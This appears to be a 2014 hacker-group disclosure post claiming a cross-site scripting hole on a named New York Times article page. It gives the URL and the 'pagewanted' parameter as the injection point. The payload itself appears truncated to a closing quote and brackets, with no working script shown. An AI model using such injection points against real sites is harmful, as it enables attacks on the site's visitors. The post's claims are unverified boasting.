================================================================================ Cross Site Scripting on New York Times ================================================================================ # Site: www.nytimes.com # Date: 25/02/2014 # Author: s4r4d0 # Contact: s4r4d0[at]yahoo[dot]com # Team: Fatal Error # Twitter: @FatalErrorSec # Made in Brazil ================================================================================ [~] PoC : # Site: www.nytimes.com # File: /2001/09/23/nyregion/one-family-two-horror-stories.html%3fpagewanted= # XSS: ">>

XSS By Fatal Error

===============================================================================